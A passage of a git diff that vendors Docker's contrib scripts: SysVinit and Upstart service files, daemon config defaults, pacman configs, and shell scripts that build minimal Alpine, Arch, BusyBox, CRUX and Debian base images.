|| true + fi + fi + done + ) +} + +case "$1" in + start) + check_init + + fail_unless_root + + cgroupfs_mount + + touch "$DOCKER_LOGFILE" + chgrp docker "$DOCKER_LOGFILE" + + ulimit -n 1048576 + + # Having non-zero limits causes performance problems due to accounting overhead + # in the kernel. We recommend using cgroups to do container-local accounting. + if [ "$BASH" ]; then + ulimit -u unlimited + else + ulimit -p unlimited + fi + + log_begin_msg "Starting $DOCKER_DESC: $BASE" + start-stop-daemon --start --background \ + --no-close \ + --exec "$DOCKERD" \ + --pidfile "$DOCKER_SSD_PIDFILE" \ + --make-pidfile \ + -- \ + -p "$DOCKER_PIDFILE" \ + $DOCKER_OPTS \ + >> "$DOCKER_LOGFILE" 2>&1 + log_end_msg $? + ;; + + stop) + check_init + fail_unless_root + log_begin_msg "Stopping $DOCKER_DESC: $BASE" + start-stop-daemon --stop --pidfile "$DOCKER_SSD_PIDFILE" --retry 10 + log_end_msg $? + ;; + + restart) + check_init + fail_unless_root + docker_pid=`cat "$DOCKER_SSD_PIDFILE" 2>/dev/null` + [ -n "$docker_pid" ] \ + && ps -p $docker_pid > /dev/null 2>&1 \ + && $0 stop + $0 start + ;; + + force-reload) + check_init + fail_unless_root + $0 restart + ;; + + status) + check_init + status_of_proc -p "$DOCKER_SSD_PIDFILE" "$DOCKERD" "$DOCKER_DESC" + ;; + + *) + echo "Usage: service docker {start|stop|restart|status}" + exit 1 + ;; +esac diff --git a/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker.default b/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker.default new file mode 100644 index 0000000000..c4e93199b4 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker.default @@ -0,0 +1,20 @@ +# Docker Upstart and SysVinit configuration file + +# +# THIS FILE DOES NOT APPLY TO SYSTEMD +# +# Please see the documentation for "systemd drop-ins": +# https://docs.docker.com/engine/admin/systemd/ +# + +# Customize location of Docker binary (especially for development testing). +#DOCKERD="/usr/local/bin/dockerd" + +# Use DOCKER_OPTS to modify the daemon startup options. +#DOCKER_OPTS="--dns 8.8.8.8 --dns 8.8.4.4" + +# If you need Docker to use an HTTP proxy, it can also be specified here. +#export http_proxy="http://127.0.0.1:3128/" + +# This is also a handy place to tweak where Docker's temporary files go. +#export DOCKER_TMPDIR="/mnt/bigdrive/docker-tmp" diff --git a/vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker b/vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker new file mode 100755 index 0000000000..df9b02a2a4 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker @@ -0,0 +1,153 @@ +#!/bin/sh +# +# /etc/rc.d/init.d/docker +# +# Daemon for docker.com +# +# chkconfig: 2345 95 95 +# description: Daemon for docker.com + +### BEGIN INIT INFO +# Provides: docker +# Required-Start: $network cgconfig +# Required-Stop: +# Should-Start: +# Should-Stop: +# Default-Start: 2 3 4 5 +# Default-Stop: 0 1 6 +# Short-Description: start and stop docker +# Description: Daemon for docker.com +### END INIT INFO + +# Source function library. +. /etc/rc.d/init.d/functions + +prog="docker" +unshare=/usr/bin/unshare +exec="/usr/bin/dockerd" +pidfile="/var/run/$prog.pid" +lockfile="/var/lock/subsys/$prog" +logfile="/var/log/$prog" + +[ -e /etc/sysconfig/$prog ] && . /etc/sysconfig/$prog + +prestart() { + service cgconfig status > /dev/null + + if [[ $? != 0 ]]; then + service cgconfig start + fi + +} + +start() { + if [ ! -x $exec ]; then + if [ ! -e $exec ]; then + echo "Docker executable $exec not found" + else + echo "You do not have permission to execute the Docker executable $exec" + fi + exit 5 + fi + + check_for_cleanup + + if ! [ -f $pidfile ]; then + prestart + printf "Starting $prog:\t" + echo "\n$(date)\n" >> $logfile + "$unshare" -m -- $exec $other_args >> $logfile 2>&1 & + pid=$! + touch $lockfile + # wait up to 10 seconds for the pidfile to exist. see + # https://github.com/docker/docker/issues/5359 + tries=0 + while [ ! -f $pidfile -a $tries -lt 10 ]; do + sleep 1 + tries=$((tries + 1)) + echo -n '.' + done + if [ ! -f $pidfile ]; then + failure + echo + exit 1 + fi + success + echo + else + failure + echo + printf "$pidfile still exists...\n" + exit 7 + fi +} + +stop() { + echo -n $"Stopping $prog: " + killproc -p $pidfile -d 300 $prog + retval=$? + echo + [ $retval -eq 0 ] && rm -f $lockfile + return $retval +} + +restart() { + stop + start +} + +reload() { + restart +} + +force_reload() { + restart +} + +rh_status() { + status -p $pidfile $prog +} + +rh_status_q() { + rh_status >/dev/null 2>&1 +} + + +check_for_cleanup() { + if [ -f ${pidfile} ]; then + /bin/ps -fp $(cat ${pidfile}) > /dev/null || rm ${pidfile} + fi +} + +case "$1" in + start) + rh_status_q && exit 0 + $1 + ;; + stop) + rh_status_q || exit 0 + $1 + ;; + restart) + $1 + ;; + reload) + rh_status_q || exit 7 + $1 + ;; + force-reload) + force_reload + ;; + status) + rh_status + ;; + condrestart|try-restart) + rh_status_q || exit 0 + restart + ;; + *) + echo $"Usage: $0 {start|stop|status|restart|condrestart|try-restart|reload|force-reload}" + exit 2 +esac + +exit $? diff --git a/vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker.sysconfig b/vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker.sysconfig new file mode 100644 index 0000000000..0864b3d77f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker.sysconfig @@ -0,0 +1,7 @@ +# /etc/sysconfig/docker +# +# Other arguments to pass to the docker daemon process +# These will be parsed by the sysv initscript and appended +# to the arguments list passed to docker daemon + +other_args="" diff --git a/vendor/github.com/docker/docker/contrib/init/upstart/REVIEWERS b/vendor/github.com/docker/docker/contrib/init/upstart/REVIEWERS new file mode 100644 index 0000000000..03ee2dde3d --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/upstart/REVIEWERS @@ -0,0 +1,2 @@ +Tianon Gravi (@tianon) +Jessie Frazelle (@jfrazelle) diff --git a/vendor/github.com/docker/docker/contrib/init/upstart/docker.conf b/vendor/github.com/docker/docker/contrib/init/upstart/docker.conf new file mode 100644 index 0000000000..d58f7d6ac8 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/upstart/docker.conf @@ -0,0 +1,72 @@ +description "Docker daemon" + +start on (filesystem and net-device-up IFACE!=lo) +stop on runlevel [!2345] + +limit nofile 524288 1048576 + +# Having non-zero limits causes performance problems due to accounting overhead +# in the kernel. We recommend using cgroups to do container-local accounting. +limit nproc unlimited unlimited + +respawn + +kill timeout 20 + +pre-start script + # see also https://github.com/tianon/cgroupfs-mount/blob/master/cgroupfs-mount + if grep -v '^#' /etc/fstab | grep -q cgroup \ + || [ ! -e /proc/cgroups ] \ + || [ ! -d /sys/fs/cgroup ]; then + exit 0 + fi + if ! mountpoint -q /sys/fs/cgroup; then + mount -t tmpfs -o uid=0,gid=0,mode=0755 cgroup /sys/fs/cgroup + fi + ( + cd /sys/fs/cgroup + for sys in $(awk '!/^#/ { if ($4 == 1) print $1 }' /proc/cgroups); do + mkdir -p $sys + if ! mountpoint -q $sys; then + if ! mount -n -t cgroup -o $sys cgroup $sys; then + rmdir $sys || true + fi + fi + done + ) +end script + +script + # modify these in /etc/default/$UPSTART_JOB (/etc/default/docker) + DOCKERD=/usr/bin/dockerd + DOCKER_OPTS= + if [ -f /etc/default/$UPSTART_JOB ]; then + . /etc/default/$UPSTART_JOB + fi + exec "$DOCKERD" $DOCKER_OPTS --raw-logs +end script + +# Don't emit "started" event until docker.sock is ready. +# See https://github.com/docker/docker/issues/6647 +post-start script + DOCKER_OPTS= + DOCKER_SOCKET= + if [ -f /etc/default/$UPSTART_JOB ]; then + . /etc/default/$UPSTART_JOB + fi + + if ! printf "%s" "$DOCKER_OPTS" | grep -qE -e '-H|--host'; then + DOCKER_SOCKET=/var/run/docker.sock + else + DOCKER_SOCKET=$(printf "%s" "$DOCKER_OPTS" | grep -oP -e '(-H|--host)\W*unix://\K(\S+)' | sed 1q) + fi + + if [ -n "$DOCKER_SOCKET" ]; then + while ! [ -e "$DOCKER_SOCKET" ]; do + initctl status $UPSTART_JOB | grep -qE "(stop|respawn)/" && exit 1 + echo "Waiting for $DOCKER_SOCKET" + sleep 0.1 + done + echo "$DOCKER_SOCKET is up" + fi +end script diff --git a/vendor/github.com/docker/docker/contrib/mac-install-bundle.sh b/vendor/github.com/docker/docker/contrib/mac-install-bundle.sh new file mode 100755 index 0000000000..2110d044d0 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mac-install-bundle.sh @@ -0,0 +1,45 @@ +#!/bin/sh + +set -e + +errexit() { + echo "$1" + exit 1 +} + +[ "$(uname -s)" == "Darwin" ] || errexit "This script can only be used on a Mac" + +[ $# -eq 1 ] || errexit "Usage: $0 install|undo" + +BUNDLE="bundles/$(cat VERSION)" +BUNDLE_PATH="$PWD/$BUNDLE" +CLIENT_PATH="$BUNDLE_PATH/cross/darwin/amd64/docker" +DATABASE="$HOME/Library/Containers/com.docker.docker/Data/database" +DATABASE_KEY="$DATABASE/com.docker.driver.amd64-linux/bundle" + +[ -d "$DATABASE" ] || errexit "Docker for Mac must be installed for this script" + +case "$1" in +"install") + [ -d "$BUNDLE" ] || errexit "cannot find bundle $BUNDLE" + [ -e "$CLIENT_PATH" ] || errexit "you need to run make cross first" + [ -e "$BUNDLE/binary-daemon/dockerd" ] || errexit "you need to build binaries first" + [ -f "$BUNDLE/binary-client/docker" ] || errexit "you need to build binaries first" + git -C "$DATABASE" reset --hard >/dev/null + echo "$BUNDLE_PATH" > "$DATABASE_KEY" + git -C "$DATABASE" add "$DATABASE_KEY" + git -C "$DATABASE" commit -m "update bundle to $BUNDLE_PATH" + rm -f /usr/local/bin/docker + cp "$CLIENT_PATH" /usr/local/bin + echo "Bundle installed. Restart Docker to use. To uninstall, reset Docker to factory defaults." + ;; +"undo") + git -C "$DATABASE" reset --hard >/dev/null + [ -f "$DATABASE_KEY" ] || errexit "bundle not set" + git -C "$DATABASE" rm "$DATABASE_KEY" + git -C "$DATABASE" commit -m "remove bundle" + rm -f /usr/local/bin/docker + ln -s "$HOME/Library/Group Containers/group.com.docker/bin/docker" /usr/local/bin + echo "Bundle removed. Using dev versions may cause issues, a reset to factory defaults is recommended." + ;; +esac diff --git a/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh b/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh new file mode 100755 index 0000000000..47cd35ce62 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh @@ -0,0 +1,87 @@ +#!/bin/sh + +set -e + +[ $(id -u) -eq 0 ] || { + printf >&2 '%s requires root\n' "$0" + exit 1 +} + +usage() { + printf >&2 '%s: [-r release] [-m mirror] [-s] [-c additional repository]\n' "$0" + exit 1 +} + +tmp() { + TMP=$(mktemp -d ${TMPDIR:-/var/tmp}/alpine-docker-XXXXXXXXXX) + ROOTFS=$(mktemp -d ${TMPDIR:-/var/tmp}/alpine-docker-rootfs-XXXXXXXXXX) + trap "rm -rf $TMP $ROOTFS" EXIT TERM INT +} + +apkv() { + curl -sSL $MAINREPO/$ARCH/APKINDEX.tar.gz | tar -Oxz | + grep --text '^P:apk-tools-static$' -A1 | tail -n1 | cut -d: -f2 +} + +getapk() { + curl -sSL $MAINREPO/$ARCH/apk-tools-static-$(apkv).apk | + tar -xz -C $TMP sbin/apk.static +} + +mkbase() { + $TMP/sbin/apk.static --repository $MAINREPO --update-cache --allow-untrusted \ + --root $ROOTFS --initdb add alpine-base +} + +conf() { + printf '%s\n' $MAINREPO > $ROOTFS/etc/apk/repositories + printf '%s\n' $ADDITIONALREPO >> $ROOTFS/etc/apk/repositories +} + +pack() { + local id + id=$(tar --numeric-owner -C $ROOTFS -c . | docker import - alpine:$REL) + + docker tag $id alpine:latest + docker run -i -t --rm alpine printf 'alpine:%s with id=%s created!\n' $REL $id +} + +save() { + [ $SAVE -eq 1 ] || return + + tar --numeric-owner -C $ROOTFS -c . | xz > rootfs.tar.xz +} + +while getopts "hr:m:s" opt; do + case $opt in + r) + REL=$OPTARG + ;; + m) + MIRROR=$OPTARG + ;; + s) + SAVE=1 + ;; + c) + ADDITIONALREPO=community + ;; + *) + usage + ;; + esac +done + +REL=${REL:-edge} +MIRROR=${MIRROR:-http://nl.alpinelinux.org/alpine} +SAVE=${SAVE:-0} +MAINREPO=$MIRROR/$REL/main +ADDITIONALREPO=$MIRROR/$REL/community +ARCH=${ARCH:-$(uname -m)} + +tmp +getapk +mkbase +conf +pack +save diff --git a/vendor/github.com/docker/docker/contrib/mkimage-arch-pacman.conf b/vendor/github.com/docker/docker/contrib/mkimage-arch-pacman.conf new file mode 100644 index 0000000000..45fe03dc96 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-arch-pacman.conf @@ -0,0 +1,92 @@ +# +# /etc/pacman.conf +# +# See the pacman.conf(5) manpage for option and repository directives + +# +# GENERAL OPTIONS +# +[options] +# The following paths are commented out with their default values listed. +# If you wish to use different paths, uncomment and update the paths. +#RootDir = / +#DBPath = /var/lib/pacman/ +#CacheDir = /var/cache/pacman/pkg/ +#LogFile = /var/log/pacman.log +#GPGDir = /etc/pacman.d/gnupg/ +HoldPkg = pacman glibc +#XferCommand = /usr/bin/curl -C - -f %u > %o +#XferCommand = /usr/bin/wget --passive-ftp -c -O %o %u +#CleanMethod = KeepInstalled +#UseDelta = 0.7 +Architecture = auto + +# Pacman won't upgrade packages listed in IgnorePkg and members of IgnoreGroup +#IgnorePkg = +#IgnoreGroup = + +#NoUpgrade = +#NoExtract = + +# Misc options +#UseSyslog +#Color +#TotalDownload +# We cannot check disk space from within a chroot environment +#CheckSpace +#VerbosePkgLists + +# By default, pacman accepts packages signed by keys that its local keyring +# trusts (see pacman-key and its man page), as well as unsigned packages. +SigLevel = Required DatabaseOptional +LocalFileSigLevel = Optional +#RemoteFileSigLevel = Required + +# NOTE: You must run `pacman-key --init` before first using pacman; the local +# keyring can then be populated with the keys of all official Arch Linux +# packagers with `pacman-key --populate archlinux`. + +# +# REPOSITORIES +# - can be defined here or included from another file +# - pacman will search repositories in the order defined here +# - local/custom mirrors can be added here or in separate files +# - repositories listed first will take precedence when packages +# have identical names, regardless of version number +# - URLs will have $repo replaced by the name of the current repo +# - URLs will have $arch replaced by the name of the architecture +# +# Repository entries are of the format: +# [repo-name] +# Server = ServerName +# Include = IncludePath +# +# The header [repo-name] is crucial - it must be present and +# uncommented to enable the repo. +# + +# The testing repositories are disabled by default. To enable, uncomment the +# repo name header and Include lines. You can add preferred servers immediately +# after the header, and they will be used before the default mirrors. + +#[testing] +#Include = /etc/pacman.d/mirrorlist + +[core] +Include = /etc/pacman.d/mirrorlist + +[extra] +Include = /etc/pacman.d/mirrorlist + +#[community-testing] +#Include = /etc/pacman.d/mirrorlist + +[community] +Include = /etc/pacman.d/mirrorlist + +# An example of a custom package repository. See the pacman manpage for +# tips on creating your own repositories. +#[custom] +#SigLevel = Optional TrustAll +#Server = file:///home/custompkgs + diff --git a/vendor/github.com/docker/docker/contrib/mkimage-arch.sh b/vendor/github.com/docker/docker/contrib/mkimage-arch.sh new file mode 100755 index 0000000000..f941177122 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-arch.sh @@ -0,0 +1,126 @@ +#!/usr/bin/env bash +# Generate a minimal filesystem for archlinux and load it into the local +# docker as "archlinux" +# requires root +set -e + +hash pacstrap &>/dev/null || { + echo "Could not find pacstrap. Run pacman -S arch-install-scripts" + exit 1 +} + +hash expect &>/dev/null || { + echo "Could not find expect. Run pacman -S expect" + exit 1 +} + + +export LANG="C.UTF-8" + +ROOTFS=$(mktemp -d ${TMPDIR:-/var/tmp}/rootfs-archlinux-XXXXXXXXXX) +chmod 755 $ROOTFS + +# packages to ignore for space savings +PKGIGNORE=( + cryptsetup + device-mapper + dhcpcd + iproute2 + jfsutils + linux + lvm2 + man-db + man-pages + mdadm + nano + netctl + openresolv + pciutils + pcmciautils + reiserfsprogs + s-nail + systemd-sysvcompat + usbutils + vi + xfsprogs +) +IFS=',' +PKGIGNORE="${PKGIGNORE[*]}" +unset IFS + +arch="$(uname -m)" +case "$arch" in + armv*) + if pacman -Q archlinuxarm-keyring >/dev/null 2>&1; then + pacman-key --init + pacman-key --populate archlinuxarm + else + echo "Could not find archlinuxarm-keyring. Please, install it and run pacman-key --populate archlinuxarm" + exit 1 + fi + PACMAN_CONF=$(mktemp ${TMPDIR:-/var/tmp}/pacman-conf-archlinux-XXXXXXXXX) + version="$(echo $arch | cut -c 5)" + sed "s/Architecture = armv/Architecture = armv${version}h/g" './mkimage-archarm-pacman.conf' > "${PACMAN_CONF}" + PACMAN_MIRRORLIST='Server = http://mirror.archlinuxarm.org/$arch/$repo' + PACMAN_EXTRA_PKGS='archlinuxarm-keyring' + EXPECT_TIMEOUT=1800 # Most armv* based devices can be very slow (e.g. RPiv1) + ARCH_KEYRING=archlinuxarm + DOCKER_IMAGE_NAME="armv${version}h/archlinux" + ;; + *) + PACMAN_CONF='./mkimage-arch-pacman.conf' + PACMAN_MIRRORLIST='Server = https://mirrors.kernel.org/archlinux/$repo/os/$arch' + PACMAN_EXTRA_PKGS='' + EXPECT_TIMEOUT=60 + ARCH_KEYRING=archlinux + DOCKER_IMAGE_NAME=archlinux + ;; +esac + +export PACMAN_MIRRORLIST + +expect < $ROOTFS/etc/locale.gen +arch-chroot $ROOTFS locale-gen +arch-chroot $ROOTFS /bin/sh -c 'echo $PACMAN_MIRRORLIST > /etc/pacman.d/mirrorlist' + +# udev doesn't work in containers, rebuild /dev +DEV=$ROOTFS/dev +rm -rf $DEV +mkdir -p $DEV +mknod -m 666 $DEV/null c 1 3 +mknod -m 666 $DEV/zero c 1 5 +mknod -m 666 $DEV/random c 1 8 +mknod -m 666 $DEV/urandom c 1 9 +mkdir -m 755 $DEV/pts +mkdir -m 1777 $DEV/shm +mknod -m 666 $DEV/tty c 5 0 +mknod -m 600 $DEV/console c 5 1 +mknod -m 666 $DEV/tty0 c 4 0 +mknod -m 666 $DEV/full c 1 7 +mknod -m 600 $DEV/initctl p +mknod -m 666 $DEV/ptmx c 5 2 +ln -sf /proc/self/fd $DEV/fd + +tar --numeric-owner --xattrs --acls -C $ROOTFS -c . | docker import - $DOCKER_IMAGE_NAME +docker run --rm -t $DOCKER_IMAGE_NAME echo Success. +rm -rf $ROOTFS diff --git a/vendor/github.com/docker/docker/contrib/mkimage-archarm-pacman.conf b/vendor/github.com/docker/docker/contrib/mkimage-archarm-pacman.conf new file mode 100644 index 0000000000..f4b45f54d7 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-archarm-pacman.conf @@ -0,0 +1,98 @@ +# +# /etc/pacman.conf +# +# See the pacman.conf(5) manpage for option and repository directives + +# +# GENERAL OPTIONS +# +[options] +# The following paths are commented out with their default values listed. +# If you wish to use different paths, uncomment and update the paths. +#RootDir = / +#DBPath = /var/lib/pacman/ +#CacheDir = /var/cache/pacman/pkg/ +#LogFile = /var/log/pacman.log +#GPGDir = /etc/pacman.d/gnupg/ +HoldPkg = pacman glibc +#XferCommand = /usr/bin/curl -C - -f %u > %o +#XferCommand = /usr/bin/wget --passive-ftp -c -O %o %u +#CleanMethod = KeepInstalled +#UseDelta = 0.7 +Architecture = armv + +# Pacman won't upgrade packages listed in IgnorePkg and members of IgnoreGroup +#IgnorePkg = +#IgnoreGroup = + +#NoUpgrade = +#NoExtract = + +# Misc options +#UseSyslog +#Color +#TotalDownload +# We cannot check disk space from within a chroot environment +#CheckSpace +#VerbosePkgLists + +# By default, pacman accepts packages signed by keys that its local keyring +# trusts (see pacman-key and its man page), as well as unsigned packages. +SigLevel = Required DatabaseOptional +LocalFileSigLevel = Optional +#RemoteFileSigLevel = Required + +# NOTE: You must run `pacman-key --init` before first using pacman; the local +# keyring can then be populated with the keys of all official Arch Linux +# packagers with `pacman-key --populate archlinux`. + +# +# REPOSITORIES +# - can be defined here or included from another file +# - pacman will search repositories in the order defined here +# - local/custom mirrors can be added here or in separate files +# - repositories listed first will take precedence when packages +# have identical names, regardless of version number +# - URLs will have $repo replaced by the name of the current repo +# - URLs will have $arch replaced by the name of the architecture +# +# Repository entries are of the format: +# [repo-name] +# Server = ServerName +# Include = IncludePath +# +# The header [repo-name] is crucial - it must be present and +# uncommented to enable the repo. +# + +# The testing repositories are disabled by default. To enable, uncomment the +# repo name header and Include lines. You can add preferred servers immediately +# after the header, and they will be used before the default mirrors. + +#[testing] +#Include = /etc/pacman.d/mirrorlist + +[core] +Include = /etc/pacman.d/mirrorlist + +[extra] +Include = /etc/pacman.d/mirrorlist + +#[community-testing] +#Include = /etc/pacman.d/mirrorlist + +[community] +Include = /etc/pacman.d/mirrorlist + +[alarm] +Include = /etc/pacman.d/mirrorlist + +[aur] +Include = /etc/pacman.d/mirrorlist + +# An example of a custom package repository. See the pacman manpage for +# tips on creating your own repositories. +#[custom] +#SigLevel = Optional TrustAll +#Server = file:///home/custompkgs + diff --git a/vendor/github.com/docker/docker/contrib/mkimage-busybox.sh b/vendor/github.com/docker/docker/contrib/mkimage-busybox.sh new file mode 100755 index 0000000000..b11a6bb265 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-busybox.sh @@ -0,0 +1,43 @@ +#!/usr/bin/env bash +# Generate a very minimal filesystem based on busybox-static, +# and load it into the local docker under the name "busybox". + +echo >&2 +echo >&2 'warning: this script is deprecated - see mkimage.sh and mkimage/busybox-static' +echo >&2 + +BUSYBOX=$(which busybox) +[ "$BUSYBOX" ] || { + echo "Sorry, I could not locate busybox." + echo "Try 'apt-get install busybox-static'?" + exit 1 +} + +set -e +ROOTFS=${TMPDIR:-/var/tmp}/rootfs-busybox-$$-$RANDOM +mkdir $ROOTFS +cd $ROOTFS + +mkdir bin etc dev dev/pts lib proc sys tmp +touch etc/resolv.conf +cp /etc/nsswitch.conf etc/nsswitch.conf +echo root:x:0:0:root:/:/bin/sh > etc/passwd +echo root:x:0: > etc/group +ln -s lib lib64 +ln -s bin sbin +cp $BUSYBOX bin +for X in $(busybox --list) +do + ln -s busybox bin/$X +done +rm bin/init +ln bin/busybox bin/init +cp /lib/x86_64-linux-gnu/lib{pthread,c,dl,nsl,nss_*}.so.* lib +cp /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 lib +for X in console null ptmx random stdin stdout stderr tty urandom zero +do + cp -a /dev/$X dev +done + +tar --numeric-owner -cf- . | docker import - busybox +docker run -i -u root busybox /bin/echo Success. diff --git a/vendor/github.com/docker/docker/contrib/mkimage-crux.sh b/vendor/github.com/docker/docker/contrib/mkimage-crux.sh new file mode 100755 index 0000000000..3f0bdcae3c --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-crux.sh @@ -0,0 +1,75 @@ +#!/usr/bin/env bash +# Generate a minimal filesystem for CRUX/Linux and load it into the local +# docker as "cruxlinux" +# requires root and the crux iso (http://crux.nu) + +set -e + +die () { + echo >&2 "$@" + exit 1 +} + +[ "$#" -eq 1 ] || die "1 argument(s) required, $# provided. Usage: ./mkimage-crux.sh /path/to/iso" + +ISO=${1} + +ROOTFS=$(mktemp -d ${TMPDIR:-/var/tmp}/rootfs-crux-XXXXXXXXXX) +CRUX=$(mktemp -d ${TMPDIR:-/var/tmp}/crux-XXXXXXXXXX) +TMP=$(mktemp -d ${TMPDIR:-/var/tmp}/XXXXXXXXXX) + +VERSION=$(basename --suffix=.iso $ISO | sed 's/[^0-9.]*\([0-9.]*\).*/\1/') + +# Mount the ISO +mount -o ro,loop $ISO $CRUX + +# Extract pkgutils +tar -C $TMP -xf $CRUX/tools/pkgutils#*.pkg.tar.gz + +# Put pkgadd in the $PATH +export PATH="$TMP/usr/bin:$PATH" + +# Install core packages +mkdir -p $ROOTFS/var/lib/pkg +touch $ROOTFS/var/lib/pkg/db +for pkg in $CRUX/crux/core/*; do + pkgadd -r $ROOTFS $pkg +done + +# Remove agetty and inittab config +if (grep agetty ${ROOTFS}/etc/inittab 2>&1 > /dev/null); then + echo "Removing agetty from /etc/inittab ..." + chroot ${ROOTFS} sed -i -e "/agetty/d" /etc/inittab + chroot ${ROOTFS} sed -i -e "/shutdown/d" /etc/inittab + chroot ${ROOTFS} sed -i -e "/^$/N;/^\n$/d" /etc/inittab +fi + +# Remove kernel source +rm -rf $ROOTFS/usr/src/* + +# udev doesn't work in containers, rebuild /dev +DEV=$ROOTFS/dev +rm -rf $DEV +mkdir -p $DEV +mknod -m 666 $DEV/null c 1 3 +mknod -m 666 $DEV/zero c 1 5 +mknod -m 666 $DEV/random c 1 8 +mknod -m 666 $DEV/urandom c 1 9 +mkdir -m 755 $DEV/pts +mkdir -m 1777 $DEV/shm +mknod -m 666 $DEV/tty c 5 0 +mknod -m 600 $DEV/console c 5 1 +mknod -m 666 $DEV/tty0 c 4 0 +mknod -m 666 $DEV/full c 1 7 +mknod -m 600 $DEV/initctl p +mknod -m 666 $DEV/ptmx c 5 2 + +IMAGE_ID=$(tar --numeric-owner -C $ROOTFS -c . | docker import - crux:$VERSION) +docker tag $IMAGE_ID crux:latest +docker run -i -t crux echo Success. + +# Cleanup +umount $CRUX +rm -rf $ROOTFS +rm -rf $CRUX +rm -rf $TMP diff --git a/vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh b/vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh new file mode 100755 index 0000000000..412a5ce0a7 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh @@ -0,0 +1,297 @@ +#!/usr/bin/env bash +set -e + +echo >&2 +echo >&2 'warning: this script is deprecated - see mkimage.sh and mkimage/debootstrap' +echo >&2 + +variant='minbase' +include='iproute,iputils-ping' +arch='amd64' # intentionally undocumented for now +skipDetection= +strictDebootstrap= +justTar= + +usage() { + echo >&2 + + echo >&2 "usage: $0 [options] repo suite [mirror]" + + echo >&2 + echo >&2 'options: (not recommended)' + echo >&2 " -p set an http_proxy for debootstrap" + echo >&2 " -v $variant # change default debootstrap variant" + echo >&2 " -i $include # change default package includes" + echo >&2 " -d # strict debootstrap (do not apply any docker-specific tweaks)" + echo >&2 " -s # skip version detection and tagging (ie, precise also tagged as 12.04)" + echo >&2 " # note that this will also skip adding universe and/or security/updates to sources.list" + echo >&2 " -t # just create a tarball, especially for dockerbrew (uses repo as tarball name)" + + echo >&2 + echo >&2 " ie: $0 username/debian squeeze" + echo >&2 " $0 username/debian squeeze http://ftp.uk.debian.org/debian/" + + echo >&2 + echo >&2 " ie: $0 username/ubuntu precise" + echo >&2 " $0 username/ubuntu precise http://mirrors.melbourne.co.uk/ubuntu/" + + echo >&2 + echo >&2 " ie: $0 -t precise.tar.bz2 precise" + echo >&2 " $0 -t wheezy.tgz wheezy" + echo >&2 " $0 -t wheezy-uk.tar.xz wheezy http://ftp.uk.debian.org/debian/" + + echo >&2 +} + +# these should match the names found at http://www.debian.org/releases/ +debianStable=wheezy +debianUnstable=sid +# this should match the name found at http://releases.ubuntu.com/ +ubuntuLatestLTS=trusty +# this should match the name found at http://releases.tanglu.org/ +tangluLatest=aequorea + +while getopts v:i:a:p:dst name; do + case "$name" in + p) + http_proxy="$OPTARG" + ;; + v) + variant="$OPTARG" + ;; + i) + include="$OPTARG" + ;; + a) + arch="$OPTARG" + ;; + d) + strictDebootstrap=1 + ;; + s) + skipDetection=1 + ;; + t) + justTar=1 + ;; + ?) + usage + exit 0 + ;; + esac +done +shift $(($OPTIND - 1)) + +repo="$1" +suite="$2" +mirror="${3:-}" # stick to the default debootstrap mirror if one is not provided + +if [ ! "$repo" ] || [ ! "$suite" ]; then + usage + exit 1 +fi + +# some rudimentary detection for whether we need to "sudo" our docker calls +docker='' +if docker version > /dev/null 2>&1; then + docker='docker' +elif sudo docker version > /dev/null 2>&1; then + docker='sudo docker' +elif command -v docker > /dev/null 2>&1; then + docker='docker' +else + echo >&2 "warning: either docker isn't installed, or your current user cannot run it;" + echo >&2 " this script is not likely to work as expected" + sleep 3 + docker='docker' # give us a command-not-found later +fi + +# make sure we have an absolute path to our final tarball so we can still reference it properly after we change directory +if [ "$justTar" ]; then + if [ ! -d "$(dirname "$repo")" ]; then + echo >&2 "error: $(dirname "$repo") does not exist" + exit 1 + fi + repo="$(cd "$(dirname "$repo")" && pwd -P)/$(basename "$repo")" +fi + +# will be filled in later, if [ -z "$skipDetection" ] +lsbDist='' + +target="${TMPDIR:-/var/tmp}/docker-rootfs-debootstrap-$suite-$$-$RANDOM" + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" +returnTo="$(pwd -P)" + +if [ "$suite" = 'lucid' ]; then + # lucid fails and doesn't include gpgv in minbase; "apt-get update" fails + include+=',gpgv' +fi + +set -x + +# bootstrap +mkdir -p "$target" +sudo http_proxy=$http_proxy debootstrap --verbose --variant="$variant" --include="$include" --arch="$arch" "$suite" "$target" "$mirror" + +cd "$target" + +if [ -z "$strictDebootstrap" ]; then + # prevent init scripts from running during install/update + # policy-rc.d (for most scripts) + echo $'#!/bin/sh\nexit 101' | sudo tee usr/sbin/policy-rc.d > /dev/null + sudo chmod +x usr/sbin/policy-rc.d + # initctl (for some pesky upstart scripts) + sudo chroot . dpkg-divert --local --rename --add /sbin/initctl + sudo ln -sf /bin/true sbin/initctl + # see https://github.com/docker/docker/issues/446#issuecomment-16953173 + + # shrink the image, since apt makes us fat (wheezy: ~157.5MB vs ~120MB) + sudo chroot . apt-get clean + + if strings usr/bin/dpkg | grep -q unsafe-io; then + # while we're at it, apt is unnecessarily slow inside containers + # this forces dpkg not to call sync() after package extraction and speeds up install + # the benefit is huge on spinning disks, and the penalty is nonexistent on SSD or decent server virtualization + echo 